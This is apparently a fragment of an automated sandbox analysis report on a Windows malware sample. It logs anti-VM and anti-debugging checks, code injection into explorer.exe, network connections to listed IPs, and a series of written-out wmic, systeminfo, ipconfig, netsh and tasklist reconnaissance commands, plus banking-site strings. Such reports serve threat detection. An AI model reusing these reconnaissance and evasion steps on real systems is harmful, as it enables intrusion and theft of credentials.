Source: C:\Windows\explorer.exe TID: 7272	Thread sleep time: -3963000s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Uses the system / local time for branch decision (may execute only at specific dates)

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00418C80 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00418EC1h	0_2_00418C80
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00418C80 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00418EC1h	4_2_00418C80
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004189C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418C01h	7_2_004189C0
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004189C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418C01h	8_2_004189C0
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00418C80 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00418EC1h	33_2_00418C80
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004189C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418C01h	34_2_004189C0

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6FB34 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,	9_2_00007FF780B6FB34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C32B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	11_2_00C32B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C31D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	11_2_00C31D4A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	11_2_00C33ED9
Source: C:\Windows\explorer.exe	Code function: 13_2_00D330A8 FindFirstFileW,FindNextFileW,FindClose,	13_2_00D330A8

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 11_2_00C36512 GetSystemInfo,

11_2_00C36512

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: F1A1.tmp.11.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: explorer.exe, 00000002.00000000.1506409569.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: F1A1.tmp.11.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: F1A1.tmp.11.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fo & echo 1315569602311345261315569602\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71431-70569-AAOEM\r\nOriginal Install Date: 03/10/2023, 10:57:18\r\nSystem Boot Time: 25/09/2023, 10:34:23\r\nSystem Manufacturer: 9exC3KV3FNmpHlL\r\nSystem Model: wmU5t6Us\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: AMUTX H8F5D, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'913 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'163 MB\r\nVirtual Memory: In Use: 1'028 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: cKXTB\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.8\r\n [02]: fe80::9405:b556:3adf:1ab3\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n1315569602311345261315569602\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp> Section . . . . . . . : Answer\r\n A (Host) Record . . . : 190.249.193.233\r\n\r\n\r\n Record Name . . . . . : nwgrus.ru\r\n Record Type . . . . . : 1\r\n Time To Live . . . . : 1\r\n Data Length . . . . . : 4\r\n Section . . . . . . . : Answer\r\n A (Host) Record . . . : 189.163.45.204\r\n\r\n\r\n1250100858311345261250100858\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>AYmrmizsszQEZUSJNBzumPLoGLVzsZFQQxVenzOODTFtCXukOkIK\SwOkIPcPPAU.exe" ,C:\Program Files (x86)\OFtAYmrmizsszQEZUSJNBzumPLoGLVzsZFQQxVen
Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00=
Source: F1A1.tmp.11.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: F1A1.tmp.11.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: F1A1.tmp.11.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: F1A1.tmp.11.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000002.3874615260.000001B605D33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: F1A1.tmp.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: F1A1.tmp.11.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: ROUTE.EXE, 00000026.00000002.3222174402.000002608D199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: F1A1.tmp.11.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: F1A1.tmp.11.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: F1A1.tmp.11.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: F1A1.tmp.11.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: explorer.exe, 0000000B.00000003.2411772678.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rs - EU East & CentralVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: F1A1.tmp.11.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: F1A1.tmp.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: F1A1.tmp.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000000.1506409569.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: F1A1.tmp.11.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\AppData\Roaming\hehcrfb	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\fihcrfb	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	System information queried: CodeIntegrityInformation	Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_00C21B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,

14_2_00C21B17

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\hehcrfb

Code function: 33_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

33_2_00401000

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\SysWOW64\explorer.exe

14_2_00C21016

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Code function: 9_2_00007FF780B678EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,

9_2_00007FF780B678EC

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00792017 push dword ptr fs:[00000030h]	0_2_00792017
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_0216092B mov eax, dword ptr fs:[00000030h]	0_2_0216092B
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_02160D90 mov eax, dword ptr fs:[00000030h]	0_2_02160D90
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_005F092B mov eax, dword ptr fs:[00000030h]	4_2_005F092B
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_005F0D90 mov eax, dword ptr fs:[00000030h]	4_2_005F0D90
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_006410AF push dword ptr fs:[00000030h]	4_2_006410AF
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_006CFE2B push dword ptr fs:[00000030h]	7_2_006CFE2B
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_0216092B mov eax, dword ptr fs:[00000030h]	7_2_0216092B
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02160D90 mov eax, dword ptr fs:[00000030h]	7_2_02160D90
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_006C092B mov eax, dword ptr fs:[00000030h]	8_2_006C092B
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_006C0D90 mov eax, dword ptr fs:[00000030h]	8_2_006C0D90
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_00710113 push dword ptr fs:[00000030h]	8_2_00710113

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Code function: 9_2_00007FF780B62654 GetProcessHeap,RtlReAllocateHeap,

9_2_00007FF780B62654

Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	33_2_00401000
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00403EE2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	33_2_00403EE2
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00408D0A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_00408D0A
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004047EE SetUnhandledExceptionFilter,	33_2_004047EE
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_00401000
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00403EE2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_00403EE2
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00408D0A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_00408D0A
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004047EE SetUnhandledExceptionFilter,	34_2_004047EE

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 354F.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 109.121.204.14 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 187.228.112.175 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 23.145.40.162 443	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Thread created: C:\Windows\explorer.exe EIP: A6F19A8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Thread created: unknown EIP: 7FC19A8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Thread created: unknown EIP: 2CE1970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Thread created: unknown EIP: 87F1970	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 1012 base: F479C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 5268 base: 7FF62D872D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 1996 base: F479C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7144 base: 7FF62D872D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 6784 base: F479C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7252 base: 7FF62D872D10 value: 90	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F479C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F479C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F479C0	Jump to behavior

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Windows\SysWOW64\explorer.exe	Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		16_2_00AD10A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		16_2_00AD1016

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process created: C:\Windows\System32\cmd.exe cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv

Source: explorer.exe, 00000002.00000000.1506409569.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1504842571.00000000044D0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: explorer.exe, 00000002.00000000.1503799740.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.1506409569.000000000936E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd]1Q

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 11_2_00C855EB cpuid

11_2_00C855EB

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: GetLocaleInfoA,		33_2_00408EA0
